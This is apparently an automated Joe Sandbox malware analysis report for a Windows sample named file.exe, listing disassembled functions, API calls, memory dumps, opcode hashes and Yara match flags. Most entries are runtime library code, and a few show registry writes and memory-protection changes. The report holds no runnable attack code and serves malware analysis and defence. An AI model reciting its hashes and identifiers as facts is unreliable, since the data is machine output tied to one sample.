                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                            • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                            • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                            • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                            Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                            • __fassign.LIBCMT ref: 1000B905
                                            • __fassign.LIBCMT ref: 1000B922
                                            • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 1735259414-0
                                            • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                            • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                            • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                            • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                            Function 04B3BBEB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,04B3BBE2,04B3B186,04B3A997), ref: 04B3BBF9
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B3BC07
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B3BC20
                                            • SetLastError.KERNEL32(00000000,04B3BBE2,04B3B186,04B3A997), ref: 04B3BC72
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: b16783f0c39d57c56231594f66b76ed3a4328b34f292f82a0de426df033f02d1
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 3F01B53630D2119EAB342BFB7CC4A6B3F54EB01A7E76002BAF125661E6EE5178027184
                                            Function 0040B984 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,0040B97B,0040AF1F,0040A730), ref: 0040B992
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9A0
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9B9
                                            • SetLastError.KERNEL32(00000000,0040B97B,0040AF1F,0040A730), ref: 0040BA0B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: c1383cefff0a9c77c0f6256a7d22d0577fd0bc713188e5814d490c4ea7085b9f
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 6D0192727197119EE63427B97CC6A6B2B94EB01778760033BF520752E2EB39480255CC
                                            Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                            • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                            • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                            • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                            • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                            Function 004015D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                                            Download Yara Rule
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 004015D5
                                              • Part of subcall function 00409842: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040984E
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 0040160B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 00401642
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00401757
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                            • String ID: string too long
                                            • API String ID: 2123813255-2556327735
                                            • Opcode ID: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                            • Instruction ID: 8b29ff92f67febe7d184f40cd986ab90276924f3587203b15f4be4e0e60d2281
                                            • Opcode Fuzzy Hash: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                            • Instruction Fuzzy Hash: 5E4127B1A00300ABD720AF759C8575BB7B8EF48354F24063AF91AE73D1E775AD0487A9
                                            Function 004058D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122registrysleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CloseCreateOpenSleepValue
                                            • String ID: mixone
                                            • API String ID: 4111408922-3123478411
                                            • Opcode ID: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                            • Instruction ID: 36deb0a2def4af7d69c3889f60f670a394a8a5da25757ff3a02b89eea185ed5b
                                            • Opcode Fuzzy Hash: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                            • Instruction Fuzzy Hash: F3418571210108AFEB08DF58DC95BEE7B65EF08300F908229F955AB5D1D778E9848F58
                                            Function 10008336 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                            Download Yara Rule
                                            Strings
                                            • C:\Users\user\Desktop\file.exe, xrefs: 1000833B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: C:\Users\user\Desktop\file.exe
                                            • API String ID: 0-517116171
                                            • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                            • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                            • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                            • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                            Function 00410580 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CA335CE0,0040280B,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105B5
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004105C7
                                            • FreeLibrary.KERNEL32(00000000,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105E9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                            • Instruction ID: f4dd53f2cc94282f557b0741292325b7031a84366b21a1c3c136dd1e19965a8c
                                            • Opcode Fuzzy Hash: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                            • Instruction Fuzzy Hash: F501A271A44625FBDB128F80DC05BEEBBB9FB04B51F004536F811A22A0DBB8A944CB58
                                            Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                            • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                            • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                            • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                            • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                            Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                            • __alloca_probe_16.LIBCMT ref: 1000A736
                                            • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                            • __freea.LIBCMT ref: 1000A837
                                            • __freea.LIBCMT ref: 1000A843
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: __alloca_probe_16__freea$Info
                                            • String ID:
                                            • API String ID: 2330168043-0
                                            • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                            • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                            • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                            • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                            Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                            Download Yara Rule
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 1000B03B
                                            • __alloca_probe_16.LIBCMT ref: 1000B101
                                            • __freea.LIBCMT ref: 1000B16D
                                              • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                            • __freea.LIBCMT ref: 1000B176
                                            • __freea.LIBCMT ref: 1000B199
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 1423051803-0
                                            • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                            • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                            • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                            • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                            Function 04D04410 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16
                                            • String ID:
                                            • API String ID: 3509577899-0
                                            • Opcode ID: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                            • Instruction ID: 4c9d79601316440c19376aba07ff063d820f792dd0d59d6e63cf9a27365d0914
                                            • Opcode Fuzzy Hash: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                            • Instruction Fuzzy Hash: 3D51BE72600246AFEB259F618C8CFBB36A9FF84718F158069FF04D7180EB70ED109660
                                            Function 00415010 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                            Download Yara Rule
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 00415095
                                            • __alloca_probe_16.LIBCMT ref: 0041515E
                                            • __freea.LIBCMT ref: 004151C5
                                              • Part of subcall function 00413C79: RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                            • __freea.LIBCMT ref: 004151D8
                                            • __freea.LIBCMT ref: 004151E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 1423051803-0
                                            • Opcode ID: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                            • Instruction ID: def92c4ecd74f4627ee81fabb5ad5435351d3551a42f570b1979e48308b83863
                                            • Opcode Fuzzy Hash: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                            • Instruction Fuzzy Hash: 1A51B372A00646FFDB225FA1CC41FFB3AA9EF84754B25002FFD04D6251EA39CD918668
                                            Function 04B32C87 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B32D2F
                                            • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B32D44
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B32D52
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B32D6D
                                            • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B32D8C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                            • String ID:
                                            • API String ID: 2509773233-0
                                            • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                            • Instruction ID: 826ff1e2edcabbf60cb91cee75bfe535ac794d9965bc4320b1427217ef8226aa
                                            • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                            • Instruction Fuzzy Hash: A2312635B00104AFDB14DF59DC40FAAB7A8EF48701F8541E9EA05EB252DB71BD16CB94
                                            Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                            • String ID:
                                            • API String ID: 3136044242-0
                                            • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                            • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                            • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                            • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                            Function 1000C51E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _free.LIBCMT ref: 1000C536
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            • _free.LIBCMT ref: 1000C548
                                            • _free.LIBCMT ref: 1000C55A
                                            • _free.LIBCMT ref: 1000C56C
                                            • _free.LIBCMT ref: 1000C57E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                            • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                            • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                            • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                            Function 10007CBA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free
                                            • String ID: *?
                                            • API String ID: 269201875-2564092906
                                            • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                            • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                            • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                            • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                            Function 10006038 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8&$C:\Users\user\Desktop\file.exe
                                            • API String ID: 0-1426767573
                                            • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                            • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                            • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                            • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                            Function 0040CA97 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAA4
                                            • GetLastError.KERNEL32(?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C836), ref: 0040CAAE
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CAD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID: api-ms-
                                            • API String ID: 3177248105-2084034818
                                            • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                            • Instruction ID: aef67c255cc06d75e4f2c7ed4f9f6bc06eb467b970858842cb7b754112db4c8a
                                            • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                            • Instruction Fuzzy Hash: 12E01230380308F6EF105F61ED46B5A3F569B11B54F108131F90DF85E1D7B5A815998C
                                            Function 10004F12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
